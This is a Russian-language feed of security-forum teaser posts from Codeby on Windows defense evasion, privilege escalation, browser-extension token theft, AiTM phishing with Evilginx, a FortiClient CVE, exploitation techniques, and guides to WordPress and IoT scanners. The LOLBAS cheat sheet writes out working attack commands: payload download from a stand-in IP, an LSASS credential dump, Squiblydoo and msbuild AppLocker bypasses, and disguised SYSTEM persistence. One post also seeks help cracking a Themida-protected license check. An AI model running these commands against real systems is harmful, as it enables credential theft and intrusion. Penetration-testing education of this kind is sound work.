Codeby

Beacon жив — но через 60 секунд его нет

Initial access получен, C2 поднят. Потом `MsMpEng.exe` режет нагрузку, Script Block Logging пишет каждый чих, AppLocker не даёт запустить ничего. Знакомо?

🔍 Windows-защита — четыре независимых эшелона:
• Статический движок Defender — сигнатуры, ML, PE-фичи
• AMSI — runtime-перехват в адресном пространстве процесса
• ETW — телеметрия для EDR на kernel-level
• AppLocker — application whitelisting на уровне user-mode

Ключевой инсайт: охранник сидит в одной камере с заключённым. amsi.dll загружается в каждую PowerShell-сессию с теми же привилегиями, что и вредоносный код. Классический патчинг AmsiScanBuffer оставляет следы в .text-секции — EDR это видит. Hardware breakpoints через DR0–DR3 обходят сканирование без записи в память.

https://codeby.net/threads/obkhod-windows-defender-i-amsi-prakticheskii-gaid-po-defense-evasion-dlya-red-team.92763/

SeImpersonatePrivilege — и ты уже на полпути к SYSTEM

Получил reverse shell от доменного юзера. whoami /priv — стандартный набор, ничего интересного. Что дальше?

🎯 Порядок приоритетов при LPE:

1. Токен — SeImpersonatePrivilege у сервисных аккаунтов IIS/MSSQL открывает Potato-атаки прямо к SYSTEM
2. Сервисы — Unquoted Service Path встречается на каждом втором пентесте, а SERVICE_CHANGE_CONFIG для группы Users — прямой билет наверх
3. UAC bypass — десятки техник без GUI, когда застрял на medium integrity
4. Kernel exploits — последнее средство: объяснять заказчику BSOD на продакшне — сомнительное удовольствие

⚡ Если оба ключа AlwaysInstallElevated выставлены в `1` — любой MSI устанавливается от SYSTEM.

Полный разбор техник, команд и нюансов эксплуатации:

https://codeby.net/threads/povysheniye-privilegii-windows-ekspluatatsiya-miskonfiguratsii-tokenov-i-obkhod-uac-na-praktike.92759/

LOLBAS шпаргалка: пост-эксплуатация Windows штатными средствами

EDR снёс инструментарий, но cmd/PowerShell живы — Windows сама несёт всё нужное:

• curl.exe -s -o C:\Temp\f.exe http://IP/f.exe — загрузка файла (Win10 1803+), сигнатуры слабее чем на certutil

• rundll32.exe comsvcs.dll, MiniDump C:\Temp\lsass.dmp full — дамп LSASS без Mimikatz, нужен SeDebugPrivilege

• regsvr32.exe /s /n /u /i:http://IP/payload.sct scrobj.dll — Squiblydoo, обход AppLocker

• msbuild.exe C:\Temp\payload.csproj — компиляция C# inline, обход AppLocker

• schtasks /create /tn "WindowsUpdate" /tr "beacon.exe" /sc onlogon /ru SYSTEM /f — persistence без PowerShell

ATT&CK-маппинг, флаги и ограничения (WDAC, Server Core) — в полной шпаргалке:

https://codeby.net/threads/lolbas-shpargalka-komandy-post-ekspluatatsii-windows-bez-storonnikh-instrumentov.92752/

WPProbe: Инструмент для сканирования и оценки безопасности WordPress

WPProbe — это высокопроизводительный сканер безопасности с открытым исходным кодом, предназначенный для обнаружения установленных плагинов и тем WordPress, а также их сопоставления с известными уязвимостями из баз данных Wordfence и WPScan. Инструмент использует WordPress для скрытного обнаружения компонентов, что позволяет минимизировать риск блокировки со стороны систем безопасности. WPProbe разработан для использования специалистами по тестированию на проникновение, администраторами сайтов и исследователями безопасности.

🎇Основные функции
- Скрытное обнаружение через REST API (идентификация более 5000 плагинов без прямого перебора директорий)
- Три режима сканирования - Stealthy (по умолчанию), Bruteforce, Hybrid
- Поддержка сканирования нескольких целей одновременно
- Поддержка JSON и CSV для интеграции в конвейеры обработки
- Фильтрация по CVE, плагину, критичности и типу аутентификации
- Встроенный механизм обновления бинарного файла и базы данных

⬇️Установка

sudo apt  install wpprobe

Проверка

wpprobe -h

⏺️Для получения свежих данных непосредственно от Wordfence можно использовать бесплатный API-ключ

#с указанием ключа
wpprobe update-db --api-key ваш_wordfence_api_ключ

#или через переменную окружения
export WORDFENCE_API_KEY=ваш_ключ
wpprobe update-db

⏺️Базовое сканирование одного сайта

wpprobe scan -u https://example.com

⏺️Сканирование с указанием режима

#скрытный режим (по умолчанию)
wpprobe scan -u https://example.com --mode stealthy

#агрессивный режим (прямой перебор)
wpprobe scan -u https://example.com --mode bruteforce

#гибридный режим
wpprobe scan -u https://example.com --mode hybrid

⏺️Массовое сканирование из файла (файл targets.txt содержит по одному URL на строку)

wpprobe scan -f targets.txt -t 20

Параметр -t задает количество одновременных потоков для ускорения обработки

⏺️Сохранение результатов

#CSV формат
wpprobe scan -u https://example.com -o results.csv

#JSON формат
wpprobe scan -u https://example.com -o results.json

⏺️Поиск уязвимостей по CVE

wpprobe search --cve CVE-2024-1234

⏺️Быстрая проверка клиентского сайта перед обновлением

wpprobe update-db
wpprobe scan -u https://client-site.com -o scan_report.csv

⏺️Поиск критических уязвимостей для приоритетного исправления

wpprobe search --severity critical --details

⏺️Проверка нового плагина перед установкой

wpprobe search --plugin newly-acquired-plugin-name

🔎Ограничения и рекомендации
- Скрытный метод обнаружения требует, чтобы REST API WordPress был доступен. Некоторые плагины или настройки безопасности могут его отключать
- Если плагин установлен, но неактивен или скрыт системами безопасности, он может остаться незамеченным
- Для максимальной точности рекомендуется использовать API-ключи для получения свежих данных

#WordPress #PluginScanner #RESTAPI #tool #pentest

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

11 строк кода — и ваша сессия уже у атакующего

Ставите расширение-переводчик. Оно честно переводит страницы — и в фоне перехватывает каждый Authorization-заголовок, сливая Bearer-токен через fetch(). Никакого 0-day — только API, который браузер сам отдал.

🔍 Расширение с правом <all_urls> видит весь трафик: банк, корпоративный портал, почту. Обработчик onBeforeSendHeaders получает Cookie, Authorization, X-CSRF-Token до отправки на сервер. Жертва не замечает ничего.

⚠️ 42% вредоносных расширений с 2018 года злоупотребляли webRequest. Manifest V3 вектор не закрыл. Двухфакторка не спасает — расширение внутри периметра доверия браузера.

Полный разбор с PoC-кодом и семплами из Chrome Web Store:

https://codeby.net/threads/kak-brauzernyye-rasshireniya-kradut-dannyye-webrequest-declarativenetrequest-i-tekhniki-perekhvata-trafika.92749/

Themida снята через unlicense — но динамический анализ не живёт.

ScyllaHide падает в Fatal Error 0x00005c, KsDumper молчит, TitanHide крашит процесс. Патч от третьих лиц через MinHook непонятным образом проходит проверку контрольной суммы импортов и переводит приложение с Dongle-проверки на сверку лицензии с файлом в папке. Алгоритм генерации этого файла — внутри. Но добраться до него не получается: защищённые .dll, замусоренный трейс после MinHook_Initialise_Hook, и приложение ещё и детектит VM.

🎯 Что уже стоит на столе у автора:
• Unlicense отработал, IAT и OEP восстановлены — есть unpacked_.exe для статики
• MinHook в чужом патче почему-то проходит CRC-проверку импортов/экспортов — и это само по себе вопрос
• Динамика умерла: 64dbg + ScyllaHide = Violation Access, чем больше опций включено, тем стабильнее краш
• Подозрение, что оригинальный алгоритм генерации затёрт, а рабочий спрятан в injected DLL — тоже под Themida

🔍 У человека конкретные три вопроса: как отличить hooked-функцию от динамически подгруженной из уже пропатченных библиотек, стоит ли дальше копать динамику через обход debugger detection, и как снимать защиту с .dll если она под VMProtect сверху. Если кто-то воевал с Themida на .dll или разбирался с injected MinHook-патчами без исходников — загляните, человек не новичок, но застрял на 4-й день.

https://codeby.net/threads/vopros-khuk-vytashchit-algoritm-generatsii-themida.92760/

🤖IoTHackBot

Набор специализированных инструментов с интеграцией Claude Code, предназначенных для тестирования на безопасность IoT-устройств, IP-камер и встроенных систем. Он включает в себя как инструменты командной строки, так и рабочие процессы с использованием искусственного интеллекта для комплексной оценки безопасности IoT.

➡️Для установки необходимо установить зависимости, склонировать репозиторий, добавить каталог bin в переменную PATH и для удобного запуска добавить бинарные файлы инструмента в конфигурацию оболочки.

pip install colorama pyserial pexpect requests
git clone https://github.com/BrownFineSecurity/iothackbot.git
cd iothackbot
export PATH="$PATH:$(pwd)/bin"
echo 'export PATH="$PATH:/path/to/iothackbot/bin"' >> ~/.bashrc

🔗Представляет собой следующий набор инструментов
Обнаружение и разведка сети
⏺️wsdiscovery — сканер протокола WS-Discovery для поиска ONVIF-камер и IoT-устройств;
⏺️iotnet — анализатор сетевого трафика IoT для выявления протоколов и уязвимостей;
⏺️netflows — извлечение сетевых потоков с разрешением DNS-имён из pcap-файлов.

Тестирование для конкретного устройства
⏺️onvifscan — сканер безопасности ONVIF-устройств: проверка обхода аутентификации, перебор учётных данных.

Анализ прошивки и файлов
⏺️chipsec — статический анализ прошивок UEFI/BIOS: обнаружение известных руткитов (LoJax, ThinkPwn, HackingTeam), генерация списка EFI-исполняемых файлов с хешами, декодирование структуры прошивки и извлечение NVRAM.

⏺️ffind — продвинутый поиск файлов с определением типов и извлечением файловых систем: определяет типы артефактных файлов, извлекает файловые системы ext2/3/4 и F2FS.

Анализ Android
⏺️apktool — распаковка APK и извлечение ресурсов: декодирование AndroidManifest.xml, извлечение ресурсов, интерфейсов и строк, дизассемблирование в smali-код.

⏺️jadx — декомпиляция APK: преобразование DEX в читаемый Java-код, поиск захардкоженных учётных данных, анализ логики приложения

Доступ к оборудованию и консоли
⏺️picocom — взаимодействие с UART-консолью IoT-устройств: управление загрузчиком, перебор и анализ shell-доступа, извлечение прошивки.

⏺️telnetshell — работа с telnet-shell на IoT-устройствах: проверка неаутентифицированного доступа к shell, сбор информации об устройстве, работа с командами BusyBox.

⛓️‍💥Использование
▶️Проверка безопасности устройств ONVIF.

onvifscan auth http://192.168.1.100
onvifscan brute http://192.168.1.100

▶️Анализ файла PCAP на предмет протоколов Интернета вещей.

iotnet capture.pcap

▶️Извлечение файловых систем из прошивки устройства.

sudo ffind firmware.bin -e

#tools #IoT #pentest

🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером

MFA пройден — жертвой же и обойдён

Представь сценарий: пользователь вводит логин, пароль, жмёт «Подтвердить» в Authenticator — и искренне считает, что защищён. В этот момент атакующий уже импортирует его session cookie в свой браузер и читает его почту. Без брутфорса. Без перебора OTP. MFA прошла сама жертва — через прокси.

Это не теория и не CVE из бюллетеня. Это AiTM-фишинг (Adversary-in-the-Middle) — рабочая индустрия с подпиской от 100 до 1000 долларов в месяц за готовый кит.

🔢 Цифры, которые неудобно игнорировать

• По данным Sekoia, с января по апрель 2025-го в активной коммерческой эксплуатации крутилось 11 различных AiTM-китов
• Только за октябрь 2025 Microsoft Defender заблокировал более 13 миллионов писем одной кампании Tycoon 2FA
• К августу 2024-го практически 100% наблюдаемых кампаний мигрировали от классического credential harvesting к proxy-based перехвату
• По данным Obsidian Security, 84% скомпрометированных аккаунтов уже имели включённый MFA

🎯 Почему TOTP, push и SMS здесь не помогают

Классический Man-in-the-Middle работает на сетевом уровне — его нейтрализует TLS. AiTM работает на уровне приложения и специально заточен под обход MFA. TLS его не останавливает, потому что прокси сам является конечной точкой обоих соединений.

Жертва устанавливает TLS-соединение с сервером атакующего. Атакующий устанавливает своё TLS-соединение с легитимным IdP. Два отдельных зашифрованных канала. Жертва видит настоящую страницу Microsoft — не копию, а реальный контент через прокси. Вводит данные, проходит MFA-challenge. После успешной аутентификации IdP выдаёт session cookie — и атакующий перехватывает его до того, как он доберётся до браузера жертвы.

🛠 Три инструмента, которые делают это реальным

Evilginx3 — standalone-приложение на Go со встроенным DNS-сервером, автоматическими TLS-сертификатами и модульной конфигурацией через phishlets. Phishlet — YAML-файл, где прописано: какие поддомены проксировать, какие POST-параметры содержат credentials и какие cookie являются session tokens. Для M365 это обычно ESTSAUTH и ESTSAUTHPERSISTENT. Evilginx на лету переписывает все ссылки в HTML/JS-ответах, подставляя фишинговые поддомены вместо оригинальных.

Modlishka и Muraena — альтернативные прокси-фреймворки с похожей логикой, но разными подходами к конфигурации и обходу детекта. Все три реализуют одну идею: стать невидимым посредником между жертвой и легитимным сервисом.

🔵 Что работает на синей стороне

Ни TOTP, ни push, ни SMS не спасают — они все транзитом проходят через прокси. Реально помогают: FIDO2/passkeys (привязаны к домену, прокси не может подделать), Conditional Access с анализом аномалий сессии и мониторинг UserAgent — после импорта cookie браузер атакующего почти всегда отличается от браузера жертвы.

Полная механика атаки, конфигурация Evilginx и индикаторы детекта для каждого фреймворка — в статье. Читай, пока твои пользователи уверены, что MFA их защищает.

https://codeby.net/threads/aitm-fishing-obkhod-mfa-cherez-evilginx-modlishka-i-muraena.92741/

FortiClient EMS: когда управляющий сервер сам открывает дверь

🔴 4 апреля Fortinet опубликовал advisory FG-IR-26-099 — в субботу пасхального уикенда. Атакующие зафиксированы на honeypot-сетях ещё 31 марта — за четыре дня до раскрытия.

CVE-2026-35616 — архитектурный баг: endpoint API торчит наружу без auth-middleware. CVSS 9.8, pre-auth, никаких учёток, никакого взаимодействия с жертвой. Отправил запрос — получил права администратора EMS.

EMS — центральный узел управления всеми FortiClient-агентами. Захватил его — получил:
• отключение защиты на эндпоинтах (T1562.001)
• развёртывание произвольных пакетов через легитимный канал
• доступ к телеметрии и учётным данным

CISA дала федеральным агентствам 3 дня на патчинг. ~2000 EMS-инстансов до сих пор смотрят в интернет.

https://codeby.net/threads/cve-2026-35616-forticlient-ems-razbor-uyazvimosti-vektor-ataki-i-metody-obnaruzheniya.92711/

Митигации включены. Эксплойт всё равно проходит.

«Memory corruption мёртв, всё закрыли ASLR и DEP» — а на последнем CTF три из четырёх pwn-тасков решились через классику. Просто с поправкой на современность.

🎯 Четыре техники, которые работают в 2026-м:
• Stack canaries — не стена, а барьер. Обходятся через format string leak или брутфорсом в fork-сервере, где канарейка не меняется между дочерними процессами
• Tcache poisoning — glibc с 2.26 дал атакующим кэш с минимальными проверками. Safe-linking в 2.32+ снимается одной утечкой heap-адреса для восстановления XOR-ключа
• ROP и JOP — код-реюз обходит DEP. Intel CET закрыл ret через Shadow Stack — и тогда в ход идут jmp reg гаджеты с dispatcher-ом. Интерпретатор из обломков чужого кода
• ASLR leak — младшие 12 бит адреса не рандомизируются никогда. Один указатель раскрывает весь регион, отсюда универсальность двухэтапной схемы leak → chain

🔍 Для каждой техники — рабочий pwntools-код, сравнительная таблица митигаций (DEP / ASLR / canaries / CFI / CET) и пошаговый workflow от checksec до интерактивного шелла. В финале — открытый вопрос про heap leak на glibc 2.35+ с Full RELRO и PIE. Интересно, кто какой примитив предпочитает.

https://codeby.net/threads/ekspluatatsiya-binarnykh-uyazvimostei-stack-overflow-heap-exploitation-rop-jop-i-obkhod-sovremennykh-zashchit.92735/